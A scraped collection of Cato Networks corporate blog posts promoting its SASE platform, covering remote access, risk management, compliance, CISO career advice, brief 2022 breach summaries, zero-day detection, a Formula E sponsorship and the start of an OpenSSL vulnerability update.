Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety...
Your Employees Need High-Performance, Secure Internet Access (and Aren’t Getting It) Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety of different pieces of software. To do their jobs, employees need high-performance, secure access to corporate networks and IT assets. This is true whether an employee is working from the office or from off-site.
As remote and hybrid work schedules become more common, companies are deploying secure remote access solutions, such as virtual private networks (VPNs) to support them. However, this often means making tradeoffs between the performance of remote workers’ network connectivity and its security.
High-Performance Internet Access is Essential for the Modern Business
In the past, most of an organization’s employees worked on-site. This meant that they were connected directly to the headquarters network and protected by its perimeter-based security solutions. However, in recent years, a growing percentage of an organization’s employees are working from outside the office. Companies have adopted remote and hybrid work policies in response to the COVID-19 pandemic and to take advantage of the global workforce. At the same time, corporate IT assets are increasingly moving to the cloud. Software as a Service (SaaS) and cloud-native applications can offer improved performance, availability, and scalability for an organization’s employees and customers.
As a result of these shifts, the corporate LAN is becoming increasingly irrelevant as it hosts a diminishing percentage of an organization’s IT assets. However, the headquarters network is also where an organization’s security solutions are located and where the traffic is routed. Remote workers need high-performance network access to corporate networks and resources. Yet the design of many modern corporate networks means that this is not always a reality.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_collab"] Why remote access should be a collaboration between network & security | Whitepaper [/boxlink]
Where Legacy Secure Remote Access Falls Short
With a growing percentage of corporate workforces working on remote or hybrid schedules, a secure remote access VPN is essential. In many cases, companies are reliant on VPNs to provide this capability. Legacy VPN solutions are simply not designed to meet the needs of the modern enterprise.
Some of the primary ways in which they fall short include:
Inefficient Routing: Remote access VPNs are designed to route remote workers’ traffic to a VPN server, which is typically located on the corporate headquarters network. However, with a growing percentage of companies’ IT assets not located on-prem, this creates inefficient routing that degrades network performance and increases latency. Inadequate Security: From a security perspective, all that a VPN does is provide an encrypted tunnel over which traffic is sent between the remote worker and the corporate network. Protecting against cyber threats and implementing a zero-trust security policy requires additional solutions alongside or instead of the VPN servers, which increases the cost and complexity of an organization’s IT infrastructure and limits its scalability.
VPNs were designed to implement a perimeter-focused security model where most of an organization’s IT assets were located on the headquarters network and needed to be protected against external threats. But this security model is no longer effective.
As a result, employees and companies are suffering from poor network performance in their remote access solutions as they try to use legacy secure remote access solutions to implement an outdated security model for a network architecture that no longer exists.
Choosing Both Performance and Security
VPNs’ design and lack of built-in security forces a tradeoff between network performance and security. Routing remote workers’ network traffic through the headquarters network for security inspection creates inefficient routes and network latency for remote users and cloud-based assets. Allowing remote users to connect directly to cloud-based assets, which provides the network performance that companies need, bypasses perimeter-based security stacks and leaves the organization at risk due to VPNs’ lack of built-in security.
Avoiding the tradeoff between network performance and security requires replacing legacy VPNs with a modern remote access solution. Secure Access Service Edge (SASE) provides numerous benefits over VPNs, including:
Cloud-Native Design: SASE solutions are deployed on globally distributed points of presence (PoPs). This allows them to be deployed geographically near an organization’s IT assets, reducing network latency, and enables them to take full advantage of the benefits of the cloud, such as scalability and availability.Zero-Trust Access Control: SASE solutions integrate secure remote access capabilities in the form of zero-trust network access (ZTNA). This allows them to implement zero-trust access controls for remote users, a capability that VPNs do not share.Integrated Security: SASE solutions combine ZTNA with a full network security stack and network optimization capabilities. Integrating security solutions with ZTNA eliminates the need for standalone security solutions alongside a VPN endpoint and enables direct connectivity to cloud-based assets without backhauling traffic to an on-prem security architecture or sacrificing security for network performance.
Corporate networks and business needs are evolving, and VPNs are not keeping up. Cato SASE Cloud, the world’s most mature single-vendor SASE platform, provides companies with the ability to support their remote workers with high-performance, secure network access. Learn more about improving the performance and security of your corporate WAN by signing up for a free demo of Cato SASE Cloud today.
Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize...
November 29, 2022
5m read
SASE is the Right Choice for Cyber Risk Management Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize the risk of a data breach, ransomware infection, or other costly and damaging security incident.
Cybersecurity tools and solutions are designed to help companies to achieve this goal of managing enterprise security risk. Of the many options out there, Secure Access Service Edge (SASE) is ideally suited to supporting all aspects of a corporate cyber risk management program.
Companies Face Significant Cyber Risks
Cybersecurity has become a top-of-mind concern for most businesses. Data breaches and ransomware attacks occur on a regular basis, often with price tags in the millions of dollars. Avoiding these incidents is essential to the profitability and survival of the business. With the growth of automated attacks and an “as a Service” cybercrime economy, the bar to entry into the cybercrime space has fallen. As cybercrime groups grow more numerous and sophisticated, any organization can be the target of a devastating attack.
Risk treatment strategies
Companies facing growing levels of cybersecurity risk need to take steps to manage these risks. In general, companies have four tools for risk treatment strategies: mitigation, transference, avoidance, and acceptance.
#1. Mitigation
Risk treatment by mitigation focuses on reducing the risk to the organization by implementing security controls. For cybersecurity risks, this could include patching vulnerable systems or deploying threat prevention capabilities that can identify and block attempted attacks before they reach vulnerable systems.
SASE solutions are ideally suited to threat mitigation due to their global reach and convergence of many security functions — including a next-generation firewall (NGFW), intrusion prevention system (IPS), cloud access security broker (CASB), zero-trust network access (ZTNA), and more — within a single solution. By consistently enforcing security policies and blocking attacks across the entire corporate WAN, SASE dramatically reduces an organization’s cybersecurity risk.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
#2. Transference
Transference involves handing over responsibility for managing risk to a third-party provider. A common form of risk transference is taking out an insurance policy. In the event that an organization experiences a risk event — such as a cyberattack — the insurance provider takes on most or all of the cost of remediating the issue and restoring normal operations.
As a managed service, SASE can be useful for risk transference because much of the responsibility for implementing a strong security program is the responsibility of the service provider, rather than the organization. For example, maintaining the security stack — a process that can require in-depth network understanding and security expertise — is outsourced with the Firewall as a Service (FWaaS) capabilities of managed SASE deployments.
By enabling an organization to implement a mature security program and improving corporate security visibility and threat prevention, managed SASE makes it easier for organizations to get cybersecurity insurance. This is especially important with the rising risk of ransomware attacks, as insurance providers are implementing increasingly stringent security requirements for organizations to take out security policies.
#3. Avoidance
In some cases, cybersecurity risks that an organization may face are avoidable. For example, if a particular vulnerability poses a significant risk to an organization’s security, the choice to stop using the vulnerable component eliminates the risk to the organization. Avoidance-based risk treatment strategies can be highly effective, but they can come with opportunity costs if a secure alternative is not available for a vulnerable component.
SASE supports risk avoidance by offering a secure alternative to legacy network security solutions. Historically, many organizations have relied on a castle-and-moat security model supported by virtual private networks (VPNs) and similar solutions. However, these models have significant shortcomings, not least the rapid dissolution of the network perimeter as companies adopt cloud computing, remote work, Internet of Things (IoT), and mobile devices.
SASE solutions help to avoid the risks associated with legacy, castle-and-moat security models by supporting granular application-based protection. With zero-trust network access (ZTNA) built into SASE solutions, organizations can avoid the security risks associated with legacy VPNs, such as poor access management.
#4. Acceptance
Completely eliminating all risk is impossible, and, in some cases, the return on investment of additional risk treatment may be too low to be profitable. Companies need to determine the level of risk that they are willing to accept — their “risk appetite” — and use other risk treatment methods (mitigation, transference, and avoidance) to reduce their risk down to that level.
Ensuring that accepted cyber risk is within an organization’s risk appetite requires comprehensive visibility into an organization’s IT infrastructure and the risks associated with it. SASE provides global visibility into activities on the corporate WAN, and built-in security solutions enable an organization to gauge their exposure to various cyber threats and take action to manage them (via firewall security rules, CASB policies, and other controls) or intelligently accept them.
Cybersecurity Risk Management with Cato
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how your organization can manage its cyber risk exposure by signing up for a free demo of Cato SASE Cloud today.
Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the...
November 24, 2022
5m read
Addressing Regulatory Compliance Challenges for the Distributed Enterprise Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the inability to perform business-critical activities, such as processing payment card data.
Digital transformation and the evolution of the regulatory landscape can pose significant compliance challenges for organizations. In most cases, the legacy security technologies designed for primarily on-prem, castle-and-moat security models are no longer enough for security. Maintaining regulatory compliance in the face of digital transformation requires security solutions designed for modern IT environments.
Companies Face Significant Compliance Challenges
Every company is subject to several regulations. Common examples include employer laws, privacy regulations (such as the GDPR), and financial regulations (such as SOX). While this has been true for some time, the complexity of achieving and maintaining regulatory compliance has grown significantly in recent years. Two of the major contributors are the changing regulatory landscape and the expansion of corporate IT networks.
An Evolving Regulatory Landscape
Within the last few years, the regulatory landscape has grown increasingly complex. Companies have long been subject to regulations such as the Payment Card Industry Data Security Standard (PCI DSS, which protects the data of payment card holders, and the Health Insurance Portability and Accessibility Act (HIPAA), a US regulation for protected health information (PHI).
However, the enactment of the General Data Protection Regulation (GDPR) within the EU has set off a surge in new data privacy laws. The GDPR defined many new rights for data subjects, and laws based upon it, such as the California Consumer Privacy Act (CCPA) and its update the California Privacy Rights Act (CPRA), implement these and other rights to varying degrees.
The patchwork of new regulations makes it more difficult for companies to achieve, maintain, and demonstrate compliance. At the same time, existing regulations, such as PCI DSS, are undergoing updates to keep up with evolving data security threats and IT infrastructure.
The Increasingly Distributed Enterprise
Regulatory compliance has also been complicated by the growing distribution of the modern enterprise. The move to cloud computing means that companies may not know where their sensitive data — potentially covered under various regulations — is being stored and processed. The growth of remote work means that employees may be downloading and processing user records in jurisdictions with different data privacy laws.
Some regulations, such as the GDPR, prohibit the transfer of constituents’ data outside of countries with “adequate” data privacy laws, a requirement that might be violated by the use of cloud computing and support for remote work. Companies may also struggle to ensure that mandatory security controls are in place for data stored on devices and infrastructure outside of their control.
It is much harder to maintain compliance with digital transformations: data is all over the place (or the world) and so are users. The way to overcome this is to use a solution that ensures that the organization has global network visibility and the ability to enforce corporate policy across its entire IT infrastructure.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_collab"] Why remote access should be a collaboration between network & security | Whitepaper [/boxlink]
Legacy Remote Access Technology No Longer Works
Historically, companies have implemented a perimeter-focused security model. Initially, this ensured that traffic moving between the corporate network and the public Internet was inspected and secured. As companies expanded to the cloud and remote work, network traffic between remote sites was backhauled to a central location for inspection and enforcement before being routed to its destination.
Correctly implemented, this model may give an organization the visibility and control that it requires for compliance. However, it does so at the cost of network performance and scalability. As corporate networks expand, a growing volume of traffic must pass through the central inspection point.
Growing traffic volumes place additional strain on network and security solutions and add to the network latency impacts on cloud-based software and remote users. Additionally, as virtual private networks (VPNs), the solutions used to implement these castle-and-moat designs, lack any built-in access controls or security capabilities, centralized security architectures require multiple standalone solutions, making them complex and expensive to scale to meet demand.
Maintaining Regulatory Compliance Despite Enterprise Expansion
The limitations of VPNs and legacy security architectures have inspired the zero trust security movement. Implementing a zero trust security model at scale requires solutions capable of enforcing access controls across an organization’s entire IT infrastructure without sacrificing network performance or visibility.
The right way to accomplish this is with a zero trust architecture that is cloud-native and globally available. Cloud-native security solutions can acquire additional resources as needed, allowing them to scale with the business and growing traffic volumes. Additionally, cloud-native security services are available everywhere that an organization’s users and data are, decreasing the performance impacts of regulatory compliance and security.
With the right zero trust architecture, there is no need to compromise or balance between business growth and regulatory compliance. Strong, scalable security meets regulatory requirements, and global visibility and automated data collection and report generation simplify regulatory compliance. Security Service Edge (SSE) and Secure Access Service Edge (SASE) provide the zero trust security architecture that enterprises need to achieve regulatory compliance. By converging networking and network security functionality into a cloud-native solution, SASE moves security tools needed for dynamic regulatory compliance to the cloud.Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about simplifying network security and regulatory compliance with Cato SASE Cloud by signing up for a free demo today.
Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements....
November 21, 2022
6m read
How to Become a Successful CISO: Advice from Amit Spitzer, Cato Networks’ CISO Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements.
After more than 15 years in security and IT, I can honestly recommend the CISO position to security or IT professionals who are looking for a demanding, yet satisfying, position. Whether you’re implementing a new technology that will help mitigate zero-day attacks or consulting the board about the security impact of an M&A, there’s rarely a dull moment in the life of a CISO. In this post, I have put together my top tips for being a successful and effective CISO, based on my own experience. I hope you find it helpful on your own career path. For a tactical and hands-on guide to becoming CISO, take a look at our blog post, “The 5-Step Action Plan to Becoming CISO”.
Before You Begin: Why Do You Want to Become a CISO?
The first step to becoming a CISO is getting clear on why you want to become one. Whether you’re planning to be a CISO at a disruptive technological company or a paper manufacturing facility, the underlying role and responsibilities of the CISO are ultimately the same: protecting the organization from bad actors who are trying to get their hands on sensitive data. If reading this description got your heart beating faster, then security is the right domain for you. Within security, the difference between a C-level security professional (a CISO) and other security professionals is the vision. A CISO envisions how she or he will impact the company’s goals and milestones, contribute to the company’s interests and protect its assets. While this keeps many a CISO up at night, it is also exciting and exhilarating, since you are involved in major company milestones, like IPOs. Are you ready to actively participate in these types of business activities? If the answer is ‘yes’, you’re in the right CISO mindset.
[boxlink link="https://catonetworks.easywebinar.live/registration-94?utm_medium=blog_top_cta&utm_campaign=ciso_perspective_masterclass"] A CISO’s Perspective on Security | Cybersecurity Master Class: Episode 5 [/boxlink]
Starting Your CISO Journey: Taking a Hands-On Approach
In the past, CISOs from legacy enterprises focused on building the organization. This first generation of CISOs was not involved in technologies. Instead, they set the stage for today’s CISOs, who are in the trenches and taking a hands-on technical approach, while also contributing to business-related goals, like their predecessors.
Such deep technological experience is gained by building yourself from the bottom-up. While a CISO is a C-level position, a good CISO will still be passionate about learning and understanding technologies. This means learning all the specifics of threats and risks and how to mitigate them. You know you’ve succeeded when you’re able to swap out all members of your team.
At the same time, a good CISO also needs to be involved in business aspects like growth, revenue, quarterly sales, etc.
Maintaining the Balancing Act Between Security and Functionality
The built-in challenge between Security and Business departments revolves around how to ensure an apt layer of security while maintaining business operational agility. Let’s face it, there is no ideal solution or global truth for answering this challenge. If the pendulum swings too far in one direction, either business or security, the risks will be too high or the business won’t be able to function, and the board might as well close the company.
In the past, the “block everything” approach was commonly implemented by companies. First generation CISOs piled up security solutions that blocked any technology or traffic that could potentially be a risk. But in a fast-growing startup that needs to be agile, this approach could quickly become the kiss of death to the business.
Instead, it is best to understand that there is no security without sales and there are no sales without security. A CISO and the security teams are here to serve the business and be growth enablers. This means understanding that every security decision made can impact the company and its development processes and therefore needs to be taken carefully.
When making decisions, I recommend building a decision tree that displays various routes of decision-making and their business outcome. Let’s think of an extreme example. If a CISO needs to determine whether or not to approve Zoom, some of the negative business outcomes of prohibiting Zoom could be:
Impacting internal communicationHindering communication with external entities: customers, vendors, partners, etc.Spending more IT resources on finding and procuring a different communication solutionTaking up employee resources for implementing and training on the new communication solution
On the other hand, the responsibility for understanding the risks of new technologies and tools is the CISO’s domain. When implementing a solution, don’t settle on visibility through advanced monitoring capabilities. You and your team need to be able to track incidents and mitigate them before they become breaches with a significant blast radius.
Goal-setting, Roadmap Creation and KPI Planning
A CISO’s goals and KPIs are derived from their main mission: protecting the organization from threat actors who are attempting to access the company’s assets. This means different things in different organizations, which makes it hard to create a global benchmark for CISOs.
For example, a KPI in one company could be to reduce the percentage of clicks on phishing emails from 5% to 3%. But in another, phishing emails are not a prominent attack vector, so such a KPI would not be considered a high priority.
I recommend you build and approve your CISO goals, roadmap and KPIs with your leadership team and board. This serves two purposes. First, ensuring that these metrics are aligned with business needs. Second, evangelizing the CISO’s role and responsibilities, and therefore creating a higher chance for you to succeed.
Tips for Getting Hired as a First-time CISO
Finding a first-time CISO role can take some time. Here’s how to make yourself stand out with recruiters and CEOs who are reviewing your CV, comparing you to other applicants or considering you for a first-time role:
Become an expert - Specialize in a security or organizational aspect and make yourself the go-to person for that field. This could be a certain application or how a practice is implemented in an organization. This becomes a strong driver for organizations to hire you and want to include you in their organization.Build confidence in your abilities - Create a sense of trust in your abilities to handle various situations, in your technological capabilities and of your business acumen. By doing so, you will be the person who is handed opportunities when they arise.Combine technology and business capabilities - Build up your business experience by taking a business-oriented approach. Don’t be afraid to hop on customer calls, answer customer questions and participate in cross-departmental brainstorming sessions where commercial questions are discussed. You can also become involved with marketing and sales processes to help them streamline their processes.
Take projects from idea to execution - Find an idea that can help the business and bring it to execution. This includes research, building rapport with colleagues, resource allocation and project management. Comprehensive project management will not only show off your leadership skills, it will also help you hone your combination of technological and business capabilities, to help you build yourself up for the role.
Next Steps for Future CISOs of Tomorrow
Your CISO journey might not be the same as your colleagues’, or it might be a textbook career path from security professional to CISO. Either way, your unique characteristics as a CISO are what will make you stand out, not how you got there. By being enthusiastic about what you do, finding creative ways to solve problems and constantly maintaining an understanding of tech and business growth, you will be able to lead security and make the best decisions for your company, which is the real indicator of success.
As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked...
November 17, 2022
3m read
The 3 Worst Breaches of 2022 That You Should Know About (That Didn’t Get Much Press or Attention) As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked company, for example when it's a notable enterprise. Other times, the attack technique was so unique, that it deserves a headline of its own.
In this blog post, we take a different approach. Instead of naming and shaming, we will review three of the worst breaches and attacker tactics and techniques of 2022 that might have gone by unnoticed, and use them as a way to learn how to better protect ourselves.
This blog post is based on episode #9 of the Cato Networks cybersecurity Master Class (“The 3 Worst Breaches of 2022 That You Probably Haven’t Heard Of”). The Master Class is taught by Etay Maor, Sr. Director of Security Strategy at Cato Networks and an industry recognized cyber security researcher and keynote speaker. You can watch all the episodes of the Master Class, here.
Attack #1: Ransomware: The Sequel
Ransomware as a service is a type of attack in which the ransomware software and infrastructure are leased out to the attackers. In this first case, the threat actors used ransomware as a service to breach the victim’s network. They were able to exploit third-party credentials to gain initial access, progress laterally and ransom the company, all within mere minutes. The swiftness of this attack is unusual. In many cases, attackers stay in the networks for weeks and months before demanding the ransom.
So, how did attackers manage to ransom a company in minutes, with no need for discovery and weeks of lateral movement?
Watch the Master Class to learn more about the history of ransomware, ransomware negotiation and various types of ransomware attacks.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-3-worst-breaches-of-2022?utm_medium=blog_top_cta&utm_campaign=3_worst_breaches_webinar"] The 3 Worst Breaches of 2022 (That You Probably Haven’t Heard Of) | Webinar [/boxlink]
Attack #2: Critical Infrastructure: Sabotaging Radiation Alert Networks
Attacks on critical infrastructure are becoming more common and more dangerous. Breaches of water supply plants, sewage systems and other such infrastructures could put millions of residents at risk of a human crisis. These infrastructures are also becoming more vulnerable, with tools like Shodan and Censys that enable finding vulnerabilities fairly easily.Let Etay Maor take you on a deep dive into ICS (Industrial Control Systems). Why are attacks moving from IT to OT (Operational Technology)? And, in the Master Class, we discuss security solutions for protecting critical infrastructure, like zero trust and SASE.
Attack #3: Ransomware (That Could Have Been Prevented)
The third attack is also a ransomware attack. This time, it consisted of a three steps approach of infiltration, lateral progression over the network, and exfiltration. You’ll learn the ins and outs of this attack, including who the victim is and why their point security solutions were not able to block this attack.Etay Maor conducts a full breach analysis, taking us from a “single-point-of-failure” mindset to a holistic and contextual approach that requires securing multiple choke points.To learn more about each of these three attacks, what to expect in 2022-2023 and how a converged security solution can assist in preventing similar attacks in the future, watch the Master Class.
Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions,...
November 14, 2022
5m read
Effective Zero-Day Threat Management Requires Cloud-Based Security Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions, cyber threat actors tune their malware to each campaign or even each target within an organization.
These zero-day attacks are more difficult and expensive to detect, creating strain on corporate security architectures. This is especially true as the growth of corporate IT infrastructures generates increasing volumes of network traffic that must be inspected and secured. Managing cyber risk to corporate IT systems requires security solutions that can scale to meet growing demand.
Zero-Day Threats Are Harder to Detect
Historically, antivirus and other threat detection technologies used signature-based detection to identify malware and other malicious content. After a new threat was identified, a signature was built based on its unique features and added to the signature library. All future content would be compared to this signature, and, if it matched, would be identified as a threat and remediated.
This approach to threat detection requires limited resources and can be highly effective at identifying known threats. However, a signature must first exist for threats to be identified. The growth of zero-day attacks leaves signature-based detection blind to many threats and creates a delay between the emergence of a new threat and solutions’ ability to identify it.
Other approaches to threat detection can identify novel and zero-day threats. For example, anomaly detection identifies deviations from normal behavior that could point to either benign errors or attempted attacks. Behavioral analysis monitors the actions of user accounts, applications, and devices for risky or malicious behaviors that pose a threat to a system.
These forms of threat detection have the ability to provide much more robust protection to an organization’s systems against novel and evolving threats. However, this improved detection comes at a price. In general, anomaly and behavioral detection consume more processing power and require access to larger datasets than traditional, signature-based detection systems. Also, non-signature detection systems have the potential for false positive detections, creating additional alerts for security personnel to sort through.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
Legacy Firewall Security Solutions Can’t Keep Up
Zero-day threat detection is essential for protecting against modern cyber threats, but it is also resource-intensive. As traffic volumes increase, the additional work required to identify novel threats can put strain on an organization’s network security architecture.
This is especially true for organizations that rely on legacy next-generation firewalls (NGFWs). Firewall security solutions deployed within an organization’s on-prem data center have limited scalability. If traffic volumes exceed the compute capabilities of an appliance-based solution or software running on a server, then the organization needs to acquire and deploy additional hardware to secure the traffic without compromising network performance. This is especially true if TLS decryption is required for inspection of encrypted traffic as this can exhaust an appliance’s compute capacity.
As the cyber threat landscape evolves, organizations will need to identify and respond to more numerous and sophisticated cyber threats, which increases the resource requirements of cyber threat detection. With legacy, appliance-based solutions deployed on-prem, companies are already forced to choose between properly protecting their environments against cyber threats and the performance of their corporate networks.
Cloud-based Security is Essential for Modern Threat Management
One of the main limitations of security solutions is that effectively inspecting and securing network traffic is computationally expensive. With limited resources, TLS decryption and in-depth inspection of network traffic can cause performance issues, especially as corporate networks and their traffic bandwidth increase.
The best way for companies to keep pace with the growing resource requirements of security is to take advantage of cloud scalability and adaptability. Cloud-native security solutions can expand the resources that they consume as needed to cope with growing network traffic volumes and the associated cost of security inspection and threat detection and response.
Secure Access Service Edge (SASE) solutions take full advantage of the benefits of the cloud to optimize corporate network security. SASE solutions converge many network and security functions into a single solution, eliminating the redundancy and waste of standalone solutions. Additionally, as cloud-native solutions, SASE solutions elastically scale to meet growing network traffic volumes or the resource requirements of expensive security operations.
In addition to solving the problem of the resource consumption of security functions, SASE solutions also provide numerous other benefits, including:
Greater Visibility: SASE solutions integrate traffic inspection and threat detection across the entire corporate WAN and not only the internet. This provides improved security visibility and additional context regarding cyber threats. Improved Threat Detection: SASE solutions can also leverage this increased visibility — as well as threat intelligence data — to more accurately identify threats to the organization. Security integration also means that threat response activities can be coordinated across the corporate WAN, providing better protection against distributed attacks. Enhanced Network Performance: SASE solutions are globally distributed and integrate network optimization functions as well as security features. Traffic can be inspected and secured at the nearest SASE point of presence before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud’s threat detection capabilities can help protect your organization against zero-day threats with a free demo.
Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as...
November 10, 2022
4m read
SASE Vendor Selection: Should You Focus on Outcomes or Tools? Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as a converged, cloud-native service. This evolution was not unlike the massive shift created by AWS’s global cloud service, which provided a new kind of infrastructure that supported scalability, resiliency, elasticity, security, connectivity and global distribution (and more).
While AWS is not necessarily the cheapest option, businesses today still choose AWS (or Azure, Google Cloud and other public cloud providers) so they can focus their IT teams on business critical projects and strategic initiatives, instead of requiring them to maintain and manage infrastructure. In other words, AWS became an extension of the IT team, turning it into a business enabler.
Cato is following a similar path. The Cato SASE Cloud provides high performance routing and security inspection of enterprise network traffic. To ensure high availability and maximal security posture, the Cato SASE cloud is optimized and maintained by our professionals from DevOps, networking and security. As a result, Cato too is an extension of the IT team, while owning the outcome: a secure and resilient infrastructure. This blog post compares Cato SASE to legacy applications while demonstrating the strategic business value of Cato. A more in-depth comparison can be found in the whitepaper which this blog post is based on. Click here to read it.
Cato SASE Cloud vs. Legacy Appliances
How is the value of Cato justified? While legacy appliances are tools, Cato SASE Cloud is built for outcomes: highly available, scalable and secure connectivity for everyone, everywhere.
Cato ensures:
Disruption-free capacity handlingNo infrastructure maintenance24x7 NOC24x7 SOC24x7 Support
Tools on the other hand create:
Complexity when deploying and planning capacity A capacity vs. usage tradeoffDifficulties maintaining the security postureAn extended attack surface of appliancesLimited support effectiveness and limited customer environment access
[boxlink link="https://www.catonetworks.com/resources/outcomes-vs-tools-why-sase-is-the-right-strategic-choice-vs-legacy-appliances/?utm_medium=blog_top_cta&utm_campaign=features_vs_outcomes"] The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes | Whitepaper [/boxlink]
Cloud-Delivered vs. Appliance-Delivered Features
Features differ in their deployment, management, scalability, and effectiveness. Let’s look at some examples of these differences through the lens of managed vs. standalone features and adaptable vs. rigid features.
Managed vs. Standalone Features
Managed - Cato’s IPS is always in a fully optimized security posture. We evaluate threats and vulnerabilities, develop mitigations and deploy only after ensuring performance isn’t negatively impacted.
Standalone - An IPS from an appliance vendor requires the IT team to deploy, assess the deployment impact on performance and ensure all appliances are kept up-to-date. Consequently, these teams are in “detect mode” instead of “prevent mode”.
Adaptable vs. Rigid Features
Adaptable - Cato’s cloud-native architectures make inspection capabilities available whenever there are new loads or new requirements, at any scale or location, and seamlessly.
Standalone - When locations and capacity are constrained, it’s the customer’s responsibility to predict future inspection capabilities. As a result, new branches, users and applications turn into business disruptors, instead of driving growth.
Conclusion
“DIY” is a good solution in some cases, but not for enterprises looking to achieve agile and flexible networking and security infrastructure. The required infrastructure expertise coupled with the lack of IT resources make DIY unsustainable in the long haul. Instead, a new partnership model with technology-as-a-service providers is required. This partnership can help organizations achieve the outcomes they need to drive their business and achieve their strategic goals.
Read more from the whitepaper “The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes”, for a closer look.
In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA...
Driving Into Action: Our New Partnership with the TAG Heuer Porsche Formula E Team In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA Formula E World Championship has been growing year-on-year and has become the testing ground for the latest innovations not only for Motorsport, but the automotive industry as a whole. So, I am thrilled to announce that today we are launching a partnership with the TAG Heuer Porsche Formula E Team as its official SASE partner.
Porsche has a rich racing history dating back to the 1950s. In Formula E’s sixth season, Porsche made its long-awaited return to top-flight single-seater racing and has continued to make positive strides over the past three years. Last season saw the team secure their first race win in Formula E with an impressive 1-2 finish in Mexico City.
At Cato, we pride ourselves on helping our customers collaborate securely from anywhere on the globe by eliminating the complexities of point solutions and delivering secure network architecture through the power of a single-vendor SASE cloud platform. Global motorsport competitions are often labeled as traveling circuses, as they assemble, race, pack up, and move on to the next country on a weekly and monthly basis. The nature of the Formula E racing season, along with the team’s extensive use of technologies and data, has meant that cloud-native networking and security infrastructure have become a cornerstone of the team’s strategy.
Click here to enlarge the image
The decisions that the TAG Heuer Porsche team makes are comparable to those of any business organization. When you need to analyze every data point from tire temperatures to battery depletion in real-time and the team’s HQ is located on the other side of the world, it’s vital the team can make split second decisions to make a difference on track.
These decisions are informed by vast datasets that the team has collected throughout each Formula E event and the car’s extensive development. These data-informed insights are critical for the team’s on-track performance and must be taken in a way that minimizes security and operational risks as well as optimal application and data access.
Cato will play an important role helping the TAG Heuer Porsche Formula E team to optimize operations and provide secure access to the network and SaaS applications all season long. We are excited and optimistic about the season and working together to… WIN!
“Join us by supporting the TAG Heuer Porsche Formula E Team when Formula E Season 9 kicks off in Mexico City on January 14th and stay tuned for more details on the partnership in the coming weeks.”
Find out more about the TAG Heuer Porsche Formula E team here: https://motorsports.porsche.com/international/en/category/formulae
The new high severity vulnerabilities in OpenSSL — CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – were disclosed this week. What is OpenSSL?...
The OpenSSL Vulnerability: A Cato Networks Labs Update The new high severity vulnerabilities in OpenSSL -- CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) – were disclosed this week.
What is OpenSSL?
OpenSSL is a popular open-source cryptography library that enables secured communications over the Internet in part through the generation of public/private keys and use of SSL and TLS protocols.
What Are the Vulnerabilities?
The vulnerabilities were found in OpenSSL versions 3.0.0. to 3.0.6. They occur after certificate verification and then only after unlikely conditions are met either signing of a malicious certificate by a certificate authority (CA) or after an application continues verifying a certificate despite failing to identify a trusted issuer.
[boxlink link="https://www.catonetworks.com/sase-quarterly-threat-research-reports/?utm_source=blog&utm_medium=top_cta&utm_campaign=q_reports"] SASE Quarterly Threat Research Reports | Go to Reports [/boxlink]
